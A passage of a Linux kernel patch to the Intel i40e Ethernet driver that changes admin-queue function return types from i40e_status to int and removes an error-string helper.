+-		return "I40E_ERR_INVALID_SD_TYPE";
+-	case I40E_ERR_MEMCPY_FAILED:
+-		return "I40E_ERR_MEMCPY_FAILED";
+-	case I40E_ERR_INVALID_HMC_OBJ_INDEX:
+-		return "I40E_ERR_INVALID_HMC_OBJ_INDEX";
+-	case I40E_ERR_INVALID_HMC_OBJ_COUNT:
+-		return "I40E_ERR_INVALID_HMC_OBJ_COUNT";
+-	case I40E_ERR_INVALID_SRQ_ARM_LIMIT:
+-		return "I40E_ERR_INVALID_SRQ_ARM_LIMIT";
+-	case I40E_ERR_SRQ_ENABLED:
+-		return "I40E_ERR_SRQ_ENABLED";
+-	case I40E_ERR_ADMIN_QUEUE_ERROR:
+-		return "I40E_ERR_ADMIN_QUEUE_ERROR";
+-	case I40E_ERR_ADMIN_QUEUE_TIMEOUT:
+-		return "I40E_ERR_ADMIN_QUEUE_TIMEOUT";
+-	case I40E_ERR_BUF_TOO_SHORT:
+-		return "I40E_ERR_BUF_TOO_SHORT";
+-	case I40E_ERR_ADMIN_QUEUE_FULL:
+-		return "I40E_ERR_ADMIN_QUEUE_FULL";
+-	case I40E_ERR_ADMIN_QUEUE_NO_WORK:
+-		return "I40E_ERR_ADMIN_QUEUE_NO_WORK";
+-	case I40E_ERR_BAD_IWARP_CQE:
+-		return "I40E_ERR_BAD_IWARP_CQE";
+-	case I40E_ERR_NVM_BLANK_MODE:
+-		return "I40E_ERR_NVM_BLANK_MODE";
+-	case I40E_ERR_NOT_IMPLEMENTED:
+-		return "I40E_ERR_NOT_IMPLEMENTED";
+-	case I40E_ERR_PE_DOORBELL_NOT_ENABLED:
+-		return "I40E_ERR_PE_DOORBELL_NOT_ENABLED";
+-	case I40E_ERR_DIAG_TEST_FAILED:
+-		return "I40E_ERR_DIAG_TEST_FAILED";
+-	case I40E_ERR_NOT_READY:
+-		return "I40E_ERR_NOT_READY";
+-	case I40E_NOT_SUPPORTED:
+-		return "I40E_NOT_SUPPORTED";
+-	case I40E_ERR_FIRMWARE_API_VERSION:
+-		return "I40E_ERR_FIRMWARE_API_VERSION";
+-	case I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR:
+-		return "I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR";
+-	}
+-
+-	snprintf(hw->err_str, sizeof(hw->err_str), "%d", stat_err);
+-	return hw->err_str;
+-}
+-
+ /**
+  * i40e_debug_aq
+  * @hw: debug mask related to admin queue
+@@ -355,13 +207,13 @@ bool i40e_check_asq_alive(struct i40e_hw *hw)
+  * Tell the Firmware that we're shutting down the AdminQ and whether
+  * or not the driver is unloading as well.
+  **/
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+-					     bool unloading)
++int i40e_aq_queue_shutdown(struct i40e_hw *hw,
++			   bool unloading)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_queue_shutdown *cmd =
+ 		(struct i40e_aqc_queue_shutdown *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_queue_shutdown);
+@@ -384,15 +236,15 @@ i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+  *
+  * Internal function to get or set RSS look up table
+  **/
+-static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+-					   u16 vsi_id, bool pf_lut,
+-					   u8 *lut, u16 lut_size,
+-					   bool set)
++static int i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
++				   u16 vsi_id, bool pf_lut,
++				   u8 *lut, u16 lut_size,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_lut *cmd_resp =
+ 		   (struct i40e_aqc_get_set_rss_lut *)&desc.params.raw;
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -437,8 +289,8 @@ static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+  *
+  * get the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size,
+ 				       false);
+@@ -454,8 +306,8 @@ i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * set the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size, true);
+ }
+@@ -469,16 +321,16 @@ i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * get the RSS key per VSI
+  **/
+-static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+-				      u16 vsi_id,
+-				      struct i40e_aqc_get_set_rss_key_data *key,
+-				      bool set)
++static int i40e_aq_get_set_rss_key(struct i40e_hw *hw,
++				   u16 vsi_id,
++				   struct i40e_aqc_get_set_rss_key_data *key,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_key *cmd_resp =
+ 			(struct i40e_aqc_get_set_rss_key *)&desc.params.raw;
+ 	u16 key_size = sizeof(struct i40e_aqc_get_set_rss_key_data);
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -509,9 +361,9 @@ static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+  * @key: pointer to key info struct
+  *
+  **/
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, false);
+ }
+@@ -524,9 +376,9 @@ i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+  *
+  * set the RSS key per VSI
+  **/
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, true);
+ }
+@@ -796,10 +648,10 @@ struct i40e_rx_ptype_decoded i40e_ptype_lookup[BIT(8)] = {
+  * hw_addr, back, device_id, vendor_id, subsystem_device_id,
+  * subsystem_vendor_id, and revision_id
+  **/
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw)
++int i40e_init_shared_code(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
+ 	u32 port, ari, func_rid;
++	int status = 0;
+ 
+ 	i40e_set_mac_type(hw);
+ 
+@@ -836,15 +688,16 @@ i40e_status i40e_init_shared_code(struct i40e_hw *hw)
+  * @addrs: the requestor's mac addr store
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+-				   u16 *flags,
+-				   struct i40e_aqc_mac_address_read_data *addrs,
+-				   struct i40e_asq_cmd_details *cmd_details)
++static int
++i40e_aq_mac_address_read(struct i40e_hw *hw,
++			 u16 *flags,
++			 struct i40e_aqc_mac_address_read_data *addrs,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_read *cmd_data =
+ 		(struct i40e_aqc_mac_address_read *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_mac_address_read);
+ 	desc.flags |= cpu_to_le16(I40E_AQ_FLAG_BUF);
+@@ -863,14 +716,14 @@ static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+  * @mac_addr: address to write
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_write *cmd_data =
+ 		(struct i40e_aqc_mac_address_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_mac_address_write);
+@@ -893,11 +746,11 @@ i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+  *
+  * Reads the adapter's MAC address from register
+  **/
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 
+@@ -914,11 +767,11 @@ i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+  *
+  * Reads the adapter's Port MAC address
+  **/
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 	if (status)
+@@ -972,13 +825,13 @@ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable)
+  *
+  *  Reads the part number string from the EEPROM.
+  **/
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size)
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
++			 u32 pba_num_size)
+ {
+-	i40e_status status = 0;
+ 	u16 pba_word = 0;
+ 	u16 pba_size = 0;
+ 	u16 pba_ptr = 0;
++	int status = 0;
+ 	u16 i = 0;
+ 
+ 	status = i40e_read_nvm_word(hw, I40E_SR_PBA_FLAGS, &pba_word);
+@@ -1087,8 +940,8 @@ static enum i40e_media_type i40e_get_media_type(struct i40e_hw *hw)
+  * @hw: pointer to the hardware structure
+  * @retry_limit: how many times to retry before failure
+  **/
+-static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+-				   u32 retry_limit)
++static int i40e_poll_globr(struct i40e_hw *hw,
++			   u32 retry_limit)
+ {
+ 	u32 cnt, reg = 0;
+ 
+@@ -1114,7 +967,7 @@ static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+  * Assuming someone else has triggered a global reset,
+  * assure the global reset is complete and then reset the PF
+  **/
+-i40e_status i40e_pf_reset(struct i40e_hw *hw)
++int i40e_pf_reset(struct i40e_hw *hw)
+ {
+ 	u32 cnt = 0;
+ 	u32 cnt1 = 0;
+@@ -1453,15 +1306,16 @@ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink)
+  *
+  * Returns the various PHY abilities supported on the Port.
+  **/
+-i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++			     bool qualified_modules, bool report_init,
++			     struct i40e_aq_get_phy_abilities_resp *abilities,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+-	struct i40e_aq_desc desc;
+-	i40e_status status;
+ 	u16 abilities_size = sizeof(struct i40e_aq_get_phy_abilities_resp);
+ 	u16 max_delay = I40E_MAX_PHY_TIMEOUT, total_delay = 0;
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	if (!abilities)
+ 		return I40E_ERR_PARAM;
+@@ -1532,14 +1386,14 @@ i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+  * of the PHY Config parameters. This status will be indicated by the
+  * command response.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aq_set_phy_config *cmd =
+ 			(struct i40e_aq_set_phy_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	if (!config)
+ 		return I40E_ERR_PARAM;
+@@ -1554,7 +1408,7 @@ enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-static noinline_for_stack enum i40e_status_code
++static noinline_for_stack int
+ i40e_set_fc_status(struct i40e_hw *hw,
+ 		   struct i40e_aq_get_phy_abilities_resp *abilities,
+ 		   bool atomic_restart)
+@@ -1612,11 +1466,11 @@ i40e_set_fc_status(struct i40e_hw *hw,
+  *
+  * Set the requested flow control mode using set_phy_config.
+  **/
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_restart)
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
++		bool atomic_restart)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	*aq_failures = 0x0;
+ 
+@@ -1655,13 +1509,13 @@ enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+  *
+  * Tell the firmware that the driver is taking over from PXE
+  **/
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_clear_pxe *cmd =
+ 		(struct i40e_aqc_clear_pxe *)&desc.params.raw;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_clear_pxe_mode);
+@@ -1683,14 +1537,14 @@ i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+  *
+  * Sets up the link and restarts the Auto-Negotiation over the link.
+  **/
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_link_restart_an *cmd =
+ 		(struct i40e_aqc_set_link_restart_an *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_link_restart_an);
+@@ -1715,17 +1569,17 @@ i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+  *
+  * Returns the link status of the adapter.
+  **/
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_link_status *resp =
+ 		(struct i40e_aqc_get_link_status *)&desc.params.raw;
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+-	i40e_status status;
+ 	bool tx_pause, rx_pause;
+ 	u16 command_flags;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_link_status);
+ 
+@@ -1811,14 +1665,14 @@ aq_get_link_info_exit:
+  *
+  * Set link interrupt mask.
+  **/
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+-				     u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
++			     u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_int_mask *cmd =
+ 		(struct i40e_aqc_set_phy_int_mask *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_int_mask);
+@@ -1838,8 +1692,8 @@ i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+  *
+  * Enable/disable loopback on a given port
+  */
+-i40e_status i40e_aq_set_mac_loopback(struct i40e_hw *hw, bool ena_lpbk,
+-				     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_mac_loopback(struct i40e_hw *hw, bool ena_lpbk,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_lb_mode *cmd =
+@@ -1864,13 +1718,13 @@ i40e_status i40e_aq_set_mac_loopback(struct i40e_hw *hw, bool ena_lpbk,
+  *
+  * Reset the external PHY.
+  **/
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_debug *cmd =
+ 		(struct i40e_aqc_set_phy_debug *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_debug);
+@@ -1905,9 +1759,9 @@ static bool i40e_is_aq_api_ver_ge(struct i40e_adminq_info *aq, u16 maj,
+  *
+  * Add a VSI context to the hardware.
+ **/
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -1915,7 +1769,7 @@ i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_vsi);
+@@ -1949,15 +1803,15 @@ aq_add_vsi_exit:
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+-				    u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_default_vsi(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -1977,15 +1831,15 @@ i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+-				      u16 seid,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2007,16 +1861,16 @@ i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+  * @cmd_details: pointer to command details structure or NULL
+  * @rx_only_promisc: flag to decide if egress traffic gets mirrored in promisc
+  **/
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				bool rx_only_promisc)
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
++					u16 seid, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2047,14 +1901,15 @@ i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+  * @set: set multicast promiscuous enable/disable
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set, struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
++					  u16 seid, bool set,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2080,16 +1935,16 @@ i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any multicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2116,16 +1971,16 @@ enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any unicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2158,15 +2013,15 @@ enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any broadcast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2193,14 +2048,14 @@ i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+  *
+  * Set or clear the broadcast promiscuous flag (filter) for a given VSI.
+  **/
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 seid, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 seid, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2226,15 +2081,15 @@ i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+  * @enable: set MAC L2 layer unicast promiscuous enable/disable for a given VLAN
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				       u16 seid, bool enable,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2256,9 +2111,9 @@ i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+  * @vsi_ctx: pointer to a vsi context struct
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2266,7 +2121,7 @@ i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_vsi_parameters);
+@@ -2298,9 +2153,9 @@ aq_get_vsi_params_exit:
+  *
+  * Update a VSI context.
+  **/
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2308,7 +2163,7 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
